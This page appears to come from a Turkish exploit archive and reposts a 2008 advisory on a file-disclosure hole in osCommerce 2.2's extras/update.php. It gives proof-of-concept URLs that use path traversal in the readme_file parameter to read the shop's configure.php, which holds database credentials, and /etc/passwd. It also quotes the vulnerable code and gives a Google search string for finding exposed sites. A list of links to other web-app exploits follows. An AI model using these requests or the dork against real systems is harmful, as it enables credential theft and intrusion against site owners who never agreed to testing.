Full-TR - osCommerce <= 2.2 (extras) Source Code Disclosure Vulnerability

Exploit / Web Apps Exploit / osCommerce <= 2.2 (extras) Source Code Disclosure Vulnerability

Eklenme Tarihi: 2008-10-20 23:05

---- osCommerce <= 2.2 "extras/" information/source code disclosure ------------

software site: http://www.oscommerce.com/

if extras/ folder is placed inside the www path, you can see all files on target
system, including php source code with database details, poc:

[url]http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php[/url]
[url]http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd[/url]

this is the vulnerable code in update.php:

...
include '../mysql.php';
// if a readme.txt file exists, display it to the user
if(!$read_me) {
if(file_exists('readme.txt')) {
$readme_file = 'readme.txt';
}
elseif(file_exists('README')) {
$readme_file = 'README';
}
elseif(file_exists('readme')) {
$readme_file = 'readme';
}
if($readme_file) {
$readme = file($readme_file);
print "<CENTER><TABLE BORDER=\"1\" WIDTH=\"75%\" CELLPADDING=\"2\" CELLSPACING=\"0\"><TR BGCOLOR=\"#e7e7cc\"><TD>\n";
print nl2br(htmlentities(implode($readme, ' ')));
print "<HR NOSHADE SIZE=\"1\"><CENTER><A HREF=\"update.php?read_me=1\"><B>Continue</B></A></CENTER>\n";
print "</TD></TR></TABLE>\n";
exit;
}
}
...

google search:

inurl:"extras/update.php" intext:mysql.php -display

--------------------------------------------------------------------------------
rgod

site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html
--------------------------------------------------------------------------------

Yorumlar:

Hen�z Yorum Eklenmedi

Yorum Ekle

Keywords:

Benzer Sayfalar (Similar Pages):

Bulunamad�. (not found)

Bu Sayfalarda �lginizi �ekebilir (The Links Bellow May Attract You As Well):

Exploit / Web Apps Exploit / WordPress Blog HTTP Splitting Vulnerability
Exploit / Web Apps Exploit / phpBB 2.0.5 SQL Injection password disclosure Exploit
Exploit / Web Apps Exploit / AWStats configdir Remote Command Execution Exploit (perl code)
Exploit / Web Apps Exploit / QWikiwiki Directory Traversal Vulnerability
Exploit / Web Apps Exploit / vBulletin LAST.PHP SQL Injection Vulnerability
Exploit / Web Apps Exploit / PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability
Exploit / Web Apps Exploit / vBulletin <= 3.0.6 php Code Injection
Exploit / Web Apps Exploit / vBulletin <= 3.0.4 "forumdisplay.php" Code Execution
Exploit / Web Apps Exploit / Webhints <= 1.03 Remote Command Execution Exploit (perl code) (3)
Exploit / Web Apps Exploit / Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)
Exploit / Web Apps Exploit / Light Weight Calendar 1.x (date) Remote Code Execution Vulnerability
Exploit / Web Apps Exploit / Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit (meta)
Exploit / Web Apps Exploit / OWL Intranet Engine 0.82 (xrms_file_root) Code Execution Exploit
Exploit / Web Apps Exploit / Fantastic News <= 2.1.2 (script_path) Remote Code Execution Exploit
Exploit / Web Apps Exploit / phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution (2)
Exploit / Web Apps Exploit / phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution
Exploit / Web Apps Exploit / Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit
Exploit / Web Apps Exploit / 4Images <= 1.7.1 (Local Inclusion) Remote Code Execution Exploit
Exploit / Web Apps Exploit / iGENUS WebMail <= 2.0.2 (config_inc.php) Remote Code Execution Exploit
Exploit / Web Apps Exploit / ReloadCMS <= 1.2.5 Cross Site Scripting / Remote Code Execution Exploit
Exploit / Web Apps Exploit / Claroline <= 1.7.4 (scormExport.inc.php) Remote Code Execution Exploit
Exploit / Web Apps Exploit / Plogger <= Beta 2.1 Administrative Credentials Disclosure Exploit
Exploit / Web Apps Exploit / TFT Gallery <= 0.10 [Password Disclosure] Remote Exploit
Exploit / Web Apps Exploit / WebAlbum <= 2.02pl COOKIE[skin2] Remote Code Execution Exploit
Exploit / Web Apps Exploit / FreeWPS <= 2.11 (images.php) Remote Code Execution Exploit
Exploit / Web Apps Exploit / ShoutLIVE <= 1.1.0 (savesettings.php) Remote Code Execution Exploit
Exploit / Web Apps Exploit / KnowledgebasePublisher 1.2 (include) Remote Code Execution Exploit
Exploit / Web Apps Exploit / php iCalendar <= 2.21 (publish.ical.php) Remote Code Execution Exploit
Exploit / Web Apps Exploit / php iCalendar <= 2.21 (Cookie) Remote Code Execution Exploit
Exploit / Web Apps Exploit / GuestBook Script <= 1.7 (include_files) Remote Code Execution Exploit